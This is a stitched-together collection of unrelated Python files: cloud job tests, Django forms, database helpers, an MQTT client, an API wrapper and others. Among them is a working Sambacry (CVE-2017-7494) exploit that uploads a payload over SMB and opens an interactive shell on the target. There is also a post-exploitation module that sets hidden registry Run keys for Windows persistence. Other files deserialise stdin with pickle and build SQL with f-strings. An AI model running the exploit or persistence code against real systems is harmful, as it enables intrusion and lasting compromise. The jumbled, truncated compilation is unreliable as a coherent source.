run_tests = run_gis_tests = NoseTestSuiteRunner
|
import pytest
import fairing
import sys
import io
import tempfile
import random
import os
from google.cloud import storage
from fairing import TrainJob
from fairing.backends import KubernetesBackend, KubeflowBackend
from fairing.backends import KubeflowGKEBackend, GKEBackend, GCPManagedBackend
GCS_PROJECT_ID = fairing.cloud.gcp.guess_project_name()
TEST_GCS_BUCKET = '{}-fairing'.format(GCS_PROJECT_ID)
DOCKER_REGISTRY = 'gcr.io/{}'.format(GCS_PROJECT_ID)
GCS_SUCCESS_MSG = "gcs access is successful"
GCS_FAILED_MSG = 'google.api_core.exceptions.Forbidden: 403'
# Training function that accesses GCS
def train_fn_with_gcs_access(temp_gcs_prefix):
rnd_number = random.randint(0, 10**9)
gcs_filename = '{}/gcs_test_file_{}.txt'.format(temp_gcs_prefix, rnd_number)
client = storage.Client()
bucket_name = '{}-fairing'.format(client.project)
bucket = client.get_bucket(bucket_name)
# Upload file to GCS
rnd_str = str(random.randint(0, 10**9))
bucket.blob(gcs_filename).upload_from_string(rnd_str)
# Download and read the file
file_contents = bucket.blob(gcs_filename).download_as_string().decode("utf-8")
if file_contents == rnd_str:
print(GCS_SUCCESS_MSG)
else:
print("gcs content mismatch, expected:'{}' got: '{}'".format(rnd_str, file_contents))
# Update module to work with function preprocessor
# TODO: Remove when the function preprocessor works with functions from
# other modules.
train_fn_with_gcs_access.__module__ = '__main__'
def run_submission_with_gcs_access(deployer, pod_spec_mutators, namespace, gcs_prefix, capsys, expected_result):
py_version = ".".join([str(x) for x in sys.version_info[0:3]])
base_image = 'registry.hub.docker.com/library/python:{}'.format(py_version)
fairing.config.set_builder(
'docker', base_image=base_image,
registry=DOCKER_REGISTRY, push=True)
fairing.config.set_deployer(
deployer, pod_spec_mutators=pod_spec_mutators, namespace=namespace)
requirements_file = os.path.relpath(os.path.join(os.path.dirname(__file__), 'requirements.txt'))
fairing.config.set_preprocessor('function',
function_obj=lambda : train_fn_with_gcs_access(gcs_prefix),
output_map={requirements_file: '/app/requirements.txt'})
fairing.config.run()
captured = capsys.readouterr()
assert expected_result in captured.out
def test_job_submission_with_gcs_access(capsys, temp_gcs_prefix):
run_submission_with_gcs_access(
'job',
pod_spec_mutators=[fairing.cloud.gcp.add_gcp_credentials],
namespace='kubeflow',
gcs_prefix=temp_gcs_prefix,
capsys=capsys,
expected_result=GCS_SUCCESS_MSG)
def test_tfjob_submission_with_gcs_access(capsys, temp_gcs_prefix):
run_submission_with_gcs_access(
'tfjob',
pod_spec_mutators=[fairing.cloud.gcp.add_gcp_credentials],
namespace='kubeflow',
gcs_prefix=temp_gcs_prefix,
capsys=capsys,
expected_result=GCS_SUCCESS_MSG)
def test_job_submission_without_gcs_access(capsys, temp_gcs_prefix):
run_submission_with_gcs_access(
'job',
pod_spec_mutators=[],
namespace='kubeflow',
gcs_prefix=temp_gcs_prefix,
capsys=capsys,
expected_result=GCS_FAILED_MSG)
def test_tfjob_submission_without_gcs_access(capsys, temp_gcs_prefix):
run_submission_with_gcs_access(
'tfjob',
pod_spec_mutators=[],
namespace='kubeflow',
gcs_prefix=temp_gcs_prefix,
capsys=capsys,
expected_result=GCS_FAILED_MSG)
def test_job_submission_invalid_namespace(capsys, temp_gcs_prefix):
with pytest.raises(ValueError) as err:
run_submission_with_gcs_access(
'job',
pod_spec_mutators=[fairing.cloud.gcp.add_gcp_credentials],
namespace='default',
gcs_prefix=temp_gcs_prefix,
capsys=capsys,
expected_result=None)
msg = 'Unable to mount credentials: '\
'Secret user-gcp-sa not found in namespace default'
assert msg in str(err.value)
def test_tfjob_submission_invalid_namespace(capsys, temp_gcs_prefix):
with pytest.raises(ValueError) as err:
run_submission_with_gcs_access(
'tfjob',
pod_spec_mutators=[fairing.cloud.gcp.add_gcp_credentials],
namespace='default',
gcs_prefix=temp_gcs_prefix,
capsys=capsys,
expected_result=None)
msg = 'Unable to mount credentials: '\
'Secret user-gcp-sa not found in namespace default'
assert msg in str(err.value)
|
txt = "Quick brown fox"
mlist = [1, 2, 3, 9]
# TODO move add to my utilities module
def add(a, b):
print(f"adding {a=} and {b=}")
return a+b
# best to keep Classes in separate module
# big class could have its own file with name such as klase.py
class Klase:
pass
class Garage:
def __init__(self, gname="La biblioteca"):
self.gname = gname
print(f"Garage initialized! {self.gname=}")
# this will also on import
# print("Running my_mod")
# this will only run when not imported
if __name__ == "__main__":
# typically you would put tests here
assert(add(2, 3) == 5)
print("This will run when my_mod.py is called normally")
my_gar = Garage()
|
'''
Created on Aug 27, 2017
@author: arnon
'''
import pickle
import sys
# need to import objects that would be passed with in
from concepts.sshtypes import RemoteWorker
workload = sys.stdin.buffer.read()
worker = pickle.loads(workload)
worker.run() |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Sambacry (CVE-2017-7494) exploit by opsxcq
github.com/opsxcq
twitter.com/opsxcq
Tested on samba 5.4.9
If you don't have a samba server, use the vulnerables/cve-2017-7494 docker image to test it
"""
from sys import argv, exit
from argparse import ArgumentParser
import os
from impacket.dcerpc.v5 import samr, transport, srvs
from impacket.dcerpc.v5.dtypes import NULL
from impacket.smbconnection import *
import sys
import time
import socket
from threading import Thread
def dceTrigger(dce):
try:
dce.connect()
except SessionError as error:
print("[+] Expected exception from Samba (SMB SessionError)")
def receiveAndPrint(sock):
try:
while True:
data = sock.recv(8)
if not data:
break
sys.stdout.write(str(data))
except Exception, e:
print("[-] Exception "+str(e))
def exploit(target, port, executable, remoteshare, remotepath, user=None, password=None, remoteShellPort=None):
"""Samba exploit"""
# Open the connection
smbClient = SMBConnection(target, target, sess_port=port)
if user:
if not smbClient.login(user,password):
raise Exception("Authentication error, invalid user or password")
else:
print("[+] Authentication ok, we are in !")
# Upload the payload module
print("[+] Preparing the exploit")
executableName = os.path.basename(executable)
executableFile = open(executable, 'rb')
smbClient.putFile(remoteshare, executableName, executableFile.read)
executableFile.close()
# Trigger the bug in another thread, since it will be locked
triggerModule = r'ncacn_np:%s[\pipe\%s]' % (target, remotepath)
rpcTransport = transport.DCERPCTransportFactory(triggerModule)
dce = rpcTransport.get_dce_rpc()
triggerThread = Thread(target=dceTrigger, args=(dce,))
triggerThread.daemon = True
triggerThread.start()
# Give some time to the exploit to run
time.sleep(2)
# Profit
if not remoteShellPort:
print("[+] Target exploited, check it")
return
remoteShellPort = int(remoteShellPort)
print("[+] Exploit trigger running in background, checking our shell")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print("[+] Connecting to %s at %s" % (target, str(remoteShellPort)))
sock.connect((target, remoteShellPort))
print("[+] Veryfying your shell...")
command="uname -a"
# Receive and print data in another thread
receiveThread = Thread(target=receiveAndPrint, args=(sock,))
receiveThread.daemon = True
receiveThread.start()
while True :
sock.send(command)
sock.send("\n")
command = raw_input(">>")
socket.close()
except Exception, e:
print("[-] IO error error connecting to the shell port "+str(e))
# Cleanup
if __name__ == "__main__":
ap = ArgumentParser(description="Sambacry (CVE-2017-7494) exploit by opsxcq")
ap.add_argument("-t", "--target", required=True, help="Target's hostname")
ap.add_argument("-e", "--executable", required=True, help="Executable/Payload file to use")
ap.add_argument("-s", "--remoteshare", required=True, help="Executable/Payload shared folder to use")
ap.add_argument("-r", "--remotepath", required=True, help="Executable/Payload path on remote file system")
ap.add_argument("-u", "--user", required=False, help="Samba username (optional")
ap.add_argument("-p", "--password", required=False, help="Samba password (optional)")
# Remote shell
ap.add_argument("-P", "--remoteshellport", required=False, help="Connect to a shell running in the remote host after exploitation")
args = vars(ap.parse_args())
# TODO : Add domain name as an argument
port = 445 # TODO : Add as an argument
try:
print("[*] Starting the exploit")
exploit(args["target"], port, args["executable"], args["remoteshare"],args["remotepath"], args["user"], args["password"], args["remoteshellport"])
except IOError:
exit("[!] Error")
except KeyboardInterrupt:
print("\n[*] Aborting the attack")
|
"""一些 MySQL 数据库操作。
create: 2018-12-12
modified:
"""
import pymysql
from .types import *
def insert_data(mysql_config: MysqlConfig, sql: str, item: Dict) -> int:
"""插入数据。"""
mysql_conn = pymysql.connect(
host=mysql_config['host'], port=mysql_config['port'],
user=mysql_config['user'], password=mysql_config['pwd'],
db=mysql_config['db'], autocommit=True
)
cursor = mysql_conn.cursor()
cursor.execute(sql, item)
cursor.close()
mysql_conn.close()
return cursor.lastrowid
def read_data(mysql_config: MysqlConfig, sql: str) -> List[Tuple]:
"""读取数据。"""
mysql_conn = pymysql.connect(
host=mysql_config['host'], port=mysql_config['port'],
user=mysql_config['user'], password=mysql_config['pwd'],
db=mysql_config['db']
)
cursor = mysql_conn.cursor()
cursor.execute(sql)
cursor.close()
mysql_conn.close()
return cursor.fetchall()
def truncate_table(mysql_config: MysqlConfig, table: str) -> None:
"""清空指定表。"""
mysql_conn = pymysql.connect(
host=mysql_config['host'], port=mysql_config['port'],
user=mysql_config['user'], password=mysql_config['pwd'],
db=mysql_config['db']
)
cursor = mysql_conn.cursor()
cursor.execute(f'TRUNCATE TABLE {table}')
cursor.close()
mysql_conn.close()
|
import sys
class UnionFind:
def __init__(self, n):
self.root = [i for i in range(n+1)]
self.rank = [0] * (n+1)
self.size = [1] * (n+1)
def find(self, x):
if self.root[x] == x:
return x
else:
y = self.find(self.root[x])
self.root[x] = y
return self.root[x]
def unite(self, x, y):
if self.is_same(x, y):
return
rx = self.find(x)
ry = self.find(y)
if self.rank[rx] < self.rank[ry]:
self.root[rx] = ry
self.size[ry] += self.size[rx]
else:
self.root[ry] = rx
self.size[rx] += self.size[ry]
if self.rank[rx] == self.rank[ry]:
self.rank[rx] += 1
def is_same(self, x, y):
return self.find(x) == self.find(y)
def main():
input = sys.stdin.readline
N, M = map(int, input().split())
road = []
for _ in range(M):
a, b, y = map(int, input().split())
road.append((y, a-1, b-1))
road = sorted(road, key=lambda x: x[0])
Q = int(input())
question = []
for i in range(Q):
v, w = map(int, input().split())
question.append((i, v-1, w))
question = sorted(question, key=lambda x: -x[2])
ans = [0 for _ in range(Q)]
r = UnionFind(N)
for i, v, w in question:
while len(road) > 0 and road[-1][0] > w:
_, a, b = road.pop()
r.unite(a, b)
ans[i] = r.size[r.find(v)]
print(*ans, sep='\n')
if __name__ == '__main__':
main()
|
from __future__ import unicode_literals
from django import forms
from django.forms.widgets import SelectDateWidget
import calendar, datetime
from django.utils import timezone
from .models import *
TYPE = (('parent', 'Parent'), ('estate', 'Estate'),)
TERMS = (('first', 'First'), ('second', 'Second'), ('third', 'Third'),)
def getYears():
styr = 2015
rng = datetime.datetime.now().year - styr + 2
yrs = []
for i in range(rng + 1):
yrs.append(styr + i)
yrs = tuple(yrs)
return yrs
SELECTYEARS = getYears()
def getCurrentYear():
return timezone.now().year
def getCurrentMonth():
return timezone.now().month
def getCurrentDay():
return timezone.now().day
def getPupils():
pupils = Pupil.objects.all().order_by('parent')
pups = []
for pupil in pupils:
pups.append((str(pupil), pupil))
pupils = tuple(pups)
return pupils
PUPILS = getPupils()
def getParents():
parents = Parent.objects.all().order_by('pname')
pars = []
for parent in parents:
pars.append((str(parent), parent))
parents = tuple(pars)
return parents
PARENTS = getParents()
class TermForm(forms.ModelForm):
class Meta:
model = Term
fields = ('term', 'year')
class ParentForm(forms.ModelForm):
class Meta:
model = Parent
fields = ('pname', 'phone')
class RateForm(forms.ModelForm):
class Meta:
model = Rate
fields = ('zone', 'rate', 'term')
class ZoneForm(forms.ModelForm):
class Meta:
model = Zone
fields = ('zone',)
# class ClassForm(forms.ModelForm):
# class Meta:
# model = Class
# fields = ('cls',)
class EstateForm(forms.ModelForm):
class Meta:
model = Estate
fields = ('estate', 'zone')
class PupilForm(forms.ModelForm):
class Meta:
model = Pupil
fields = ('fname', 'sname', 'parent')
class EstatePupilForm(forms.ModelForm):
class Meta:
model = EstatePupil
fields = ('pupil', 'estate')
class TermPupilForm(forms.ModelForm):
class Meta:
model = TermPupil
fields = ('pupil', 'term')
class PaymentForm(forms.ModelForm):
class Meta:
model = Payment
fields = ('pupil', 'amount', 'datepaid', 'mode')
class PickPeriodForm(forms.Form):
start = forms.DateField(widget=SelectDateWidget(years=SELECTYEARS), initial=timezone.now)
end = forms.DateField(widget=SelectDateWidget(years=SELECTYEARS), initial=timezone.now)
class PickTermForm(forms.Form):
term = forms.CharField(max_length=10, required=True, widget=forms.Select(choices=TERMS))
year = forms.IntegerField(min_value=2015, max_value=2020, initial=getCurrentYear)
class PickMonthYearForm(forms.Form):
months=[]
for i in range(13):
month = calendar.month_name[i]
months.append((month.lower(), month.title()))
MONTHS=tuple(months[1:])
month = forms.CharField(max_length=15, required=True, widget=forms.Select(choices=MONTHS), initial=getCurrentMonth)
year = forms.IntegerField(min_value=SELECTYEARS[0], max_value=SELECTYEARS[len(SELECTYEARS)-1], initial=getCurrentYear)
class PickSummaryForm(forms.Form):
sumtype = forms.CharField(max_length=10, required=True, widget=forms.Select(choices=TYPE))
term = forms.CharField(max_length=10, required=True, widget=forms.Select(choices=TERMS))
year = forms.IntegerField(min_value=SELECTYEARS[0], max_value=SELECTYEARS[len(SELECTYEARS)-1], initial=getCurrentYear)
class PickPupilForm(forms.Form):
pupils = forms.CharField(max_length=100, required=True, widget=forms.Select(choices=PUPILS))
class PickParentForm(forms.Form):
parent = forms.CharField(max_length=100, required=True, widget=forms.Select(choices=PARENTS)) |
import pyttsx3
import pandas as pd
import openpyxl # 需有此才能順利開啟xlsx
import tkinter as tk
import PyPDF2
# 也可用pdfplumber
import os
import boto3 # AWS SDK for Python (Boto3)
# ---------------------------------- 常數設定 ---------------------------------- #
KEY_WORDS = "Many online quizzes at URL below\n "
KEY_END_WORDS = "\n Sources"
# AWS
ID = os.environ.get("AWS_ID")
KEY = os.environ.get("AWS_ACCESS_KEY")
# ---------------------------------- Class ---------------------------------- #
# Create a Reading Breaking News class
class ReadBreakingNews(PyPDF2.PdfFileReader):
def __init__(self, f):
super().__init__(stream=f, strict=True, warndest=None, overwriteWarnings=True)
self.origin = self.read_all()
self.title, self.published_date, self.content = self.find_paragraph(start=KEY_WORDS, end=KEY_END_WORDS)
self.news = self.published_date + "\n" + self.title + "\n" + self.content
def read_all(self):
text = []
for page in range(self.numPages):
text.append(self.getPage(page).extractText())
return text
def find_paragraph(self, start=None, end=None):
"""
:param start: Put the key words which is put before title.
:param end: ut the key words which is put after content.
Usually, it won't be changed unless the website change the basic form.
:return: title, date, content, sentences
"""
# 依排版確認pdf關鍵字後,找到其index(title_start_from),再找第一次出現'\n '(title_end_from)即後面會接日期的地方
# 取出此區間的字串,即為title
# 再以此方式,陸續找出date 和content
title_start_from = self.origin[0].find(start) # return index
title_start_from = title_start_from + len(start)
title_end_from = self.origin[0][title_start_from:].find("\n ")
title_end_from = title_start_from + title_end_from
title = self.origin[0][title_start_from:title_end_from]
title = title.replace("\n", "")
date_start_from = self.origin[0][title_end_from:].find("\n ")
date_start_from = title_end_from + date_start_from
# +8 係針對'\n '加上'\n, 2021'
date_end_from = self.origin[0][title_end_from:].find("\n, ") + 8
date_end_from = date_start_from + date_end_from
published_date = self.origin[0][date_start_from:date_end_from]
published_date = published_date.replace("\n", "").lstrip()
content_end_from = self.origin[0].find(end)
content = self.origin[0][date_end_from:content_end_from].lstrip()
content = content.replace("\n", "")
content = content.replace('\"', '')
return title, published_date, content
# ---------------------------------- UI setting -Main Window ---------------------------------- #
# ---------------------------------- Preliminary - Tackle PDF ---------------------------------- #
# Read pdf by PyPDF2
file = open("example.pdf", "rb")
pdf = ReadBreakingNews(file)
news = pdf.news
print(news) # 留著,可以確認完整性,以確認版本是否有變動
# ---------------------------------- Convert PDF to Audio ---------------------------------- #
# Method 1: Offline - 轉換pdf內容成audio
# engine = pyttsx3.init()
# voices = engine.getProperty("voices") # 取得發音原
# rate = engine.getProperty("rate")
# engine.setProperty("voice", voices[2].id) # 設定發音員
# engine.setProperty("rate", 130) # 設定語速,預設為每分鐘200
# engine.say(news) # 將轉換成音檔的文章放入
# engine.save_to_file(news, "python_example_audio.mp3") # 儲存音檔
# engine.runAndWait() # 執行(要放最後)
# Method 2: Online - Use AWS and boto3 to create the audio
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/polly.html?highlight=polly#Polly.Client.synthesize_speech
polly_client = boto3.Session(
aws_access_key_id=ID,
aws_secret_access_key=KEY,
region_name='us-west-2').client('polly') # polly為AWS提供的 text-to-speech(TTS)服務
response = polly_client.synthesize_speech(VoiceId='Joanna',
OutputFormat='mp3',
LanguageCode='en-US',
Text=news,
Engine='neural')
file = open('polly_example_audio.mp3', 'wb') # 建立一個mp3檔
file.write(response['AudioStream'].read())
file.close()
|
"""
UConnMQTT module
This module implements the MQTT connection and messaging through the Mosquitto broker
"""
import logging
from . import exceptions, config
import paho.mqtt.client as mqtt
import time
class UConnMQTT(object):
"""
MQTT class
"""
def __init__(self):
"""
Initialize MQTT connection
"""
self.__topic = None
self.__message_callback = None
self.reconnection = 0
self.__config = config.Config()
try:
self.__reconnect_time = int(self.__config.messaging_reconnect_time)
except (TypeError, ValueError):
self.__reconnect_time = 60
# Get connection parameters
username, password, host = self.__get_connection_parameters()
# Establish connection
self.__establish_connection(username, password, host)
@staticmethod
def __log_exception(ex):
"""
Exception handler
:param ex: Raised exception
:raise: UtimConnectionException, UtimUnknownException
"""
etype = type(ex)
if etype == ValueError and \
(str(ex) == 'Invalid host.' or str(ex) == 'Invalid credentials.'):
logging.exception("Connection error " + str(ex))
raise exceptions.UtimConnectionException
else:
logging.error('Unknown error ' + str(ex))
raise exceptions.UtimUnknownException
def __get_connection_parameters(self):
"""
Function to get parameters for Mosquitto broker from config.py
:return: Triplet of username, password and host address
:rtype: str, str, str
"""
return self.__config.messaging_username, self.__config.messaging_password, self.__config.messaging_hostname
def __establish_connection(self, username, password, hostname):
"""
Exception handler
:param str username: User name
:param str password: User password
:param str hostname: Host name
:return: Opened channel
:raise: UtimConnectionException
"""
self.connectionFlag = False
while True:
try:
if username is None or password is None:
raise ValueError('Invalid credentials.')
if hostname is None:
raise ValueError('Invalid host.')
# Parameters and credentials
self.__client = mqtt.Client()
self.__client.on_connect = self.on_connect
self.__client.on_disconnect = self.on_disconnect
self.__client.username_pw_set(username, password)
self.__client.on_message = self._on_message
self.__client.connect(hostname)
self.__client.loop_start()
break
except ValueError as er:
self.__log_exception(er)
except OSError as er:
time.sleep(1)
if self.reconnection == 0:
print('ucon-mqtt - Attempt to reconnect within %s seconds', self.__reconnect_time)
logging.error(er)
logging.error('Attempt to reconnect within %s seconds', self.__reconnect_time)
self.reconnection += 1
print("RECONNECTION TIMES: {0}".format(self.reconnection))
time.sleep(1)
if self.__reconnect_time <= self.reconnection:
print('ucon-mqtt - Reconnection timeout !')
logging.error('Reconnection timeout !')
raise exceptions.UtimConnectionException(er)
def on_connect(self, client, userdata, flags, rc):
print("ucon-mqtt - Internet connection established..")
logging.debug("Internet connection established..")
self.reconnection = 0
self.connectionFlag = True
if self.__topic:
self.__client.subscribe(self.__topic)
def on_disconnect(self, client, userdata, rc):
print("ucon-mqtt - Internet connection losted..")
logging.debug("Internet connection losted..")
self.connectionFlag = False
if rc != mqtt.MQTT_ERR_SUCCESS:
self.reconnection += 1
print("RECONNECTION TIMES: {0}".format(self.reconnection))
self.__client.loop_stop(force=True)
if self.__reconnect_time <= self.reconnection:
print('ucon-mqtt - Reconnection timeout !')
logging.error('Reconnection timeout !')
raise exceptions.UtimConnectionException()
# Get connection parameters
username, password, host = self.__get_connection_parameters()
# Establish connection
self.__establish_connection(username, password, host)
def disconnect(self):
"""
Disconnect from broker
"""
self.__client.disconnect()
self.__client.loop_stop(force=True)
def subscribe(self, topic, cbobj, callback):
"""
Subscribe
:param str topic: Channel name to listen
:param callback: Callback
"""
self.__topic = topic
self.__cbobject = cbobj
self.__message_callback = callback
self.__client.subscribe(topic)
def unsubscribe(self, topic):
"""
Unsubscribe
:param str topic: Channel name to listen
"""
self.__topic = None
self.__cbobject = None
self.__message_callback = None
self.__client.unsubscribe(topic)
def publish(self, sender, destination, message):
"""
Publish
:param str sender: Message sender
:param str destination: Message destination (non empty string)
:param str message: The message to send
"""
try:
if (not isinstance(destination, str) or not destination or
not isinstance(message, bytes) or
not isinstance(sender, bytes)):
raise exceptions.UtimExchangeException
msg = sender + b' ' + message
logging.info("UMQTT PUBLISH MESSAGE: {0}".format(msg))
self.__client.publish(topic=destination, payload=msg)
except exceptions.UtimExchangeException as ex:
self.__log_exception(ex)
def _on_message(self, client, userdata, message):
"""
On message callback
:param mqtt.Client client: mqtt.Client instance
:param userdata: private user data as set in Client() or userdata_set()
:param message: instance of MQTTMessage
:returns: 0 - if custom message callback was called, 1 - if custom message callback is None,
None - else
"""
msg = message.payload
m = msg.partition(b' ')
if callable(self.__message_callback):
self.__message_callback(self.__cbobject, m[0], m[2])
return 0
return 1
|
#!/usr/bin/env python3
n, *a = map(int, open(0))
print(-(-n // min(a)) + 4) |
from __future__ import absolute_import
from django.apps import AppConfig
class Config(AppConfig):
name = "sentry.lang.java"
def ready(self):
from .plugin import JavaPlugin
from sentry.plugins import register
register(JavaPlugin)
|
# -*- coding: utf-8 -*-
# @File : SimpleRewMsfModule.py
# @Date : 2019/1/11
# @Desc :
from Lib.ModuleAPI import *
class PostModule(PostMSFCSharpModule):
NAME_ZH = "Windows注册表Run键值持久化(C#)"
DESC_ZH = "模块通过调用SharpHide.exe写入隐藏的注册表键值,实现持久化.\n" \
"SharpHide.exe会将目标exe路径写入到注册表Run键值中.\n"
NAME_EN = "Windows registry Run key persistence (C#)"
DESC_EN = "The module realizes persistence by calling Sharphide.exe to write hidden registry keys.\n" \
"SharpHide.exe will write the target exe path into the registry Run key.\n"
MODULETYPE = TAG2TYPE.Persistence
PLATFORM = ["Windows"] # 平台
PERMISSIONS = ["User", "Administrator", "SYSTEM", ] # 所需权限
ATTCK = ["T1037"] # ATTCK向量
README = ["https://www.yuque.com/vipersec/module/npl2d8"]
REFERENCES = ["https://github.com/outflanknl/SharpHide"]
AUTHOR = ["Viper"]
OPTIONS = register_options([
OptionEnum(name='action',
tag_zh="执行动作",
desc_zh="针对键值的执行的命令",
tag_en="Action", desc_en="Action",
required=True,
enum_list=[
{'tag_zh': "创建", 'tag_en': "Create", 'value': "create"},
{'tag_zh': "删除", 'tag_en': "Delete", 'value': "delete"},
],
length=6),
OptionStr(name='keyvalue',
tag_zh="可执行文件目录",
desc_zh="输入开启启动的exe文件路径.",
tag_en="Exe file directory", desc_en="Enter the path of the exe file to start.",
required=True,
length=18),
OptionStr(name='arguments',
tag_zh="命令行参数", required=False,
desc_zh="执行exe是的命令行参数",
tag_en="Command line parameters", desc_en="Command line parameters for executing exe",
length=24),
])
def __init__(self, sessionid, ipaddress, custom_param):
super().__init__(sessionid, ipaddress, custom_param)
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_windows is not True:
return False, "此模块只支持Windows的Meterpreter", "This module only supports Meterpreter for Windows"
self.set_assembly("SharpHide")
if self.param("action") == "delete":
self.set_arguments("action=delete")
else:
param_keyvalue = self.param("keyvalue")
arguments = f"action=create keyvalue='{param_keyvalue}'"
param_arguments = self.param("arguments")
if param_arguments is not None:
arguments += f" arguments='{param_arguments}'"
self.set_arguments(arguments)
return True, None
def callback(self, status, message, data):
assembly_out = self.get_console_output(status, message, data)
self.log_raw(assembly_out)
|
'''
Created on 17.07.2011
@author: kca
'''
import logging, sys
from futile.logging import get_logger
from subprocess import check_output as _check_output, check_call as _check_call, CalledProcessError, STDOUT, Popen
try:
from subprocces import SubprocessError, TimeoutExpired
except ImportError:
class SubprocessError(Exception):
pass
class TimeoutExpired(SubprocessError):
pass
def _pre_call(args):
#needed for chroot safety
import encodings.string_escape
cmd = ' '.join(args)
get_logger().debug("running %s" % (cmd, ))
return cmd
def check_output(args, stdin=None, stderr=STDOUT, shell=False, cwd=None, env=None, *popenargs, **popenkw):
cmd = _pre_call(args)
try:
return _check_output(args, stdin=stdin, stderr=stderr, shell=shell, cwd=cwd, env=env, *popenargs, **popenkw)
except CalledProcessError as e:
get_logger().debug("Command %s returned exit code %s. This is the programs output:\n%s<<EOF>>" % (cmd, e.returncode, e.output))
raise
def check_call(args, stdin=None, stdout=None, stderr=None, shell=False, cwd=None, env=None, *popenargs, **popenkw):
cmd = _pre_call(args)
try:
return _check_call(args, stdin=stdin, stdout=stdout, stderr=stderr, shell=shell, cwd=cwd, env=env, *popenargs, **popenkw)
except CalledProcessError as e:
get_logger().debug("Command %s returned exit code %s." % (cmd, e.returncode))
raise
|
"""Support testing with Pytest."""
import pytest
import os
import logging
from asgi_tools.tests import manage_lifespan
from . import TestClient
def pytest_addoption(parser):
"""Append pytest options for testing Muffin apps."""
parser.addini('muffin_app', 'Set path to muffin application')
parser.addoption('--muffin-app', dest='muffin_app', help='Set to muffin application')
parser.addini('muffin_config', 'Set module path to muffin configuration')
parser.addoption('--muffin-config', dest='muffin_config',
help='Set module path to muffin configuration')
def pytest_load_initial_conftests(early_config, parser, args):
"""Prepare to loading Muffin application."""
from muffin import CONFIG_ENV_VARIABLE
options = parser.parse_known_args(args)
# Initialize configuration
config = options.muffin_config or early_config.getini('muffin_config')
if config:
os.environ[CONFIG_ENV_VARIABLE] = config
# Initialize application
app_ = options.muffin_app or early_config.getini('muffin_app')
early_config.app = app_
@pytest.fixture(scope='session')
async def app(pytestconfig, request, aiolib):
"""Load an application, run lifespan events, prepare plugins."""
if not pytestconfig.app:
logging.warning(
'Improperly configured. Please set ``muffin_app`` in your pytest config. '
'Or use ``--muffin-app`` command option.')
return
from muffin.utils import import_app
app = import_app(pytestconfig.app)
msg = f"Setup application '{app.cfg.name}'"
if app.cfg.config:
msg += f"with config '{app.cfg.config}'"
app.logger.info(msg)
async with manage_lifespan(app):
# Setup plugins
for plugin in app.plugins.values():
if hasattr(plugin, 'conftest') and plugin.conftest is not None:
app.logger.info(f"Setup plugin '{plugin.name}'")
await plugin.conftest()
yield app
@pytest.fixture
def client(app):
"""Generate a test client for the app."""
return TestClient(app)
|
import re
import functools
from collections import OrderedDict
from functools import partialmethod as pm
from typing import Optional
from lxml import etree
from zeep import Client, Plugin
from zeep.exceptions import Fault
from zeep.helpers import serialize_object
from . import utils
class TRTH:
"""A Pythonic wrapper for the TRTH API based on Zeep."""
TRTH_VERSION = '5.8'
TRTH_WSDL_URL = f'https://trth-api.thomsonreuters.com/TRTHApi-{TRTH_VERSION}/wsdl/TRTHApi.wsdl'
def __init__(self, config=None):
self.config = utils.load_config(config)
self.logger = utils.make_logger('pytrthree', self.config)
self.options = dict(debug=False, target_cls=dict, raise_exception=False,
input_parser=True, output_parser=True)
self.plugin = DebugPlugin(self)
self.client = Client(self.TRTH_WSDL_URL, strict=True, plugins=[self.plugin])
self.factory = self.client.type_factory('ns0')
self.signatures = self._parse_signatures()
self._make_docstring()
self.client.set_default_soapheaders(self._make_header())
self.logger.info('TRTH API initialized.')
def __getattr__(self, item):
try:
return self.__dict__[item]
except KeyError:
return self.options[item]
def _parse_signatures(self):
"""Parses API functions signature from WSDL document"""
signatures = {}
for service in self.client.wsdl.services.values():
for port in service.ports.values():
for op in port.binding._operations.values():
input_sig = re.sub("{[^}]*}", '', op.input.body.signature())
output_sig = re.sub("{[^}]*}", '', op.output.body.signature())
input_sig = re.sub('\w+\(|\)', '', input_sig)
output_sig = re.sub('\w+\(|\)', '', output_sig)
signatures[op.name] = (input_sig, output_sig)
return signatures
def _make_docstring(self):
"""Dynamically generates docstrings for API function partials"""
def formatter(func_name):
indent = ' ' * 8 + '\n'
input_sig, output_sig = self.signatures[func_name]
output_sig = re.sub('\w+: ', '', output_sig) if output_sig else None
signature = f'{indent}{func_name}({input_sig}) --> {output_sig}'
reference = ('See TRTH API User Guide for further documentation: '
'https://tickhistory.thomsonreuters.com/\n')
params = indent.join([':param {}'.format(i) for i in input_sig.split(', ') if i])
ret = f'{indent}:return: {output_sig}'
docstring = '\n'.join([signature, reference, params, ret])
docstring = re.sub(r'\n\s*\n', '\n', docstring)
return lambda: print(signature.strip()), docstring
for attr in dir(self):
obj = getattr(self, attr)
if isinstance(obj, functools.partial):
new_obj = functools.update_wrapper(obj, self._wrap)
func = obj.keywords['function']
new_obj.signature, new_obj.__doc__ = formatter(func)
setattr(self, attr, new_obj)
def _make_header(self):
"""
Does initial authentication with the TRTH API
and generates unique token used in subsequent API requests.
"""
self.logger.info('Making credentials.')
credentials = self.factory.CredentialsHeader(tokenId='', **self.config['credentials'])
header = {'CredentialsHeader': credentials}
# Dummy request to get tokenId
response = self.client.service.GetVersion(_soapheaders=header)
header = {'CredentialsHeader': response.header.CredentialsHeader}
self.logger.info(f'Username: {response.header.CredentialsHeader.username}')
self.logger.info(f'Token ID: {response.header.CredentialsHeader.tokenId}')
return header
def _wrap(self, *args, function=None, **kwargs) -> Optional[dict]:
"""
Wrapper for TRTH API functions.
:param function: Wrapped TRTH API function string name
:param args: API function arguments
:param kwargs: API function arguments
"""
if function is None:
raise ValueError('API function not specified')
if self.debug:
print(self.signatures[function])
input_type, output_type = self.signatures[function]
params = self._parse_params(args, kwargs, input_type)
try:
f = getattr(self.client.service, function)
resp = f(**params)
return self._parse_response(resp, output_type)
except Fault as fault:
if self.raise_exception:
raise fault
else:
self.logger.error(fault)
def _parse_params(self, args, kwargs, input_type):
"""
Uses util parser functions so that the user doesn't have to manually instanciate
`self.factory` classes. Also provides reasonable default values for some types.
Can be disabled by editing `self.options`.
:param args: API function arguments passed by the user
:param kwargs: API function arguments passed by the user
:param input_type: API function input signataure
:return: Parsed/filled function input parameter dictionary
"""
# Parsing args and kwargs into an OrderedDict
params = re.findall('(\w+): (\w*:?\w+)', input_type)
params = OrderedDict([(name, [typ, None]) for name, typ in params])
for name, value in zip(params, args):
params[name][1] = value
for name, value in kwargs.items():
params[name][1] = value
